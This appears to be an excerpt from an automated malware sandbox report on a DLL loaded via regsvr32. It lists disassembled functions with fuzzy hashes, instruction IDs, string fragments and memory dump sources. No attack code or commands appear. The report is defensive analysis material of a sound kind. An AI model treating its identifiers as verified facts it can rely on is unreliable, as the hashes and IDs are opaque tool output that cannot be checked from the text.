                                                                                                                                • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                                • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800014F8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,$z
                                                                                                                                • API String ID: 0-3532108746
                                                                                                                                • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                                • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                                                                                • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                                • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001A460 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: g/?$~l;
                                                                                                                                • API String ID: 0-1448562259
                                                                                                                                • Opcode ID: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                                                                                • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                                                                                • Opcode Fuzzy Hash: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                                                                                • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000F128 Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: JM$S
                                                                                                                                • API String ID: 0-422059844
                                                                                                                                • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                                • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                                                                                • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                                • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000671C Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: \4t$sT>
                                                                                                                                • API String ID: 0-514966222
                                                                                                                                • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                                • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                                                                                • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                                • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800075D4 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6 zT$lh
                                                                                                                                • API String ID: 0-3667112246
                                                                                                                                • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                                • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                                                                                • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                                • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800248A8 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 2Q'$t<p
                                                                                                                                • API String ID: 0-2959822804
                                                                                                                                • Opcode ID: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                                                                                • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                                                                                • Opcode Fuzzy Hash: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                                                                                • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180012F28 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 95s$\`s
                                                                                                                                • API String ID: 0-3495284040
                                                                                                                                • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                                • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                                                                                • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                                • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001AAB8 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 3*$qMu
                                                                                                                                • API String ID: 0-4093015089
                                                                                                                                • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                                • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                                                                                • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                                • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002C904 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X$"n&E
                                                                                                                                • API String ID: 0-1188898577
                                                                                                                                • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                                • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                                                                                • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                                • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800176B8 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Bw~$fy
                                                                                                                                • API String ID: 0-1663007907
                                                                                                                                • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                                • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                                                                                • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                                • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180013150 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: /0$XyLe
                                                                                                                                • API String ID: 0-3562702181
                                                                                                                                • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                                • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                                                                                • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                                • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800190D4 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: >I$>I
                                                                                                                                • API String ID: 0-3948471910
                                                                                                                                • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                                • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                                                                                • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                                • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001DA80 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: {H2}$}i#c
                                                                                                                                • API String ID: 0-1724349491
                                                                                                                                • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                                                                                • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800269B0 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4V$so
                                                                                                                                • API String ID: 0-1060102820
                                                                                                                                • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                                                                                • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800296EC Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: F+'$O$
                                                                                                                                • API String ID: 0-4064122715
                                                                                                                                • Opcode ID: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                                • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                                                                                • Opcode Fuzzy Hash: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                                • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800121CC Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 1$bO6
                                                                                                                                • API String ID: 0-3242911120
                                                                                                                                • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                                                                                • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180019D60 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )j-J$\rba
                                                                                                                                • API String ID: 0-105394296
                                                                                                                                • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                                                                                • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180024698 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 5T$7c
                                                                                                                                • API String ID: 0-2666566123
                                                                                                                                • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                                                                                • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180017BDC Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ",)x$PX
                                                                                                                                • API String ID: 0-926260526
                                                                                                                                • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                                                                                • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C834 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                • Instruction ID: 4372841d88d4d60d7093200b1980131e20ca047403c329814e9786e38b2bba7a
                                                                                                                                • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                • Instruction Fuzzy Hash: D7115EB2A086078BFB188B31C0953B937E0FB94B29F544435C60D462F6DF7CD5A58786
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C8C8 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFFEFB95A8C), ref: 00007FFFEFB9C8FD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                • Instruction ID: 2cae8c26008a14e4ddea24875f7e543b323329a939aa06a867c6343099036fd6
                                                                                                                                • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                • Instruction Fuzzy Hash: 0AF0A4A2E0850746FB199B31C4153B937D1AB94B54F189031C64D422F6CF6CD5918242
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9DF3C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale_getptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3731964398-0
                                                                                                                                • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                                • Instruction ID: 201831e2cbbc098f72e1062612b1d388b2a73888a1d7cd0985ff173b51b5962d
                                                                                                                                • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                                • Instruction Fuzzy Hash: 2FF05422A186C183D7118B16F04415AB761F7D4BF0F584221EB9D17BA9CE2CC856CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C7F4 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099609381-0
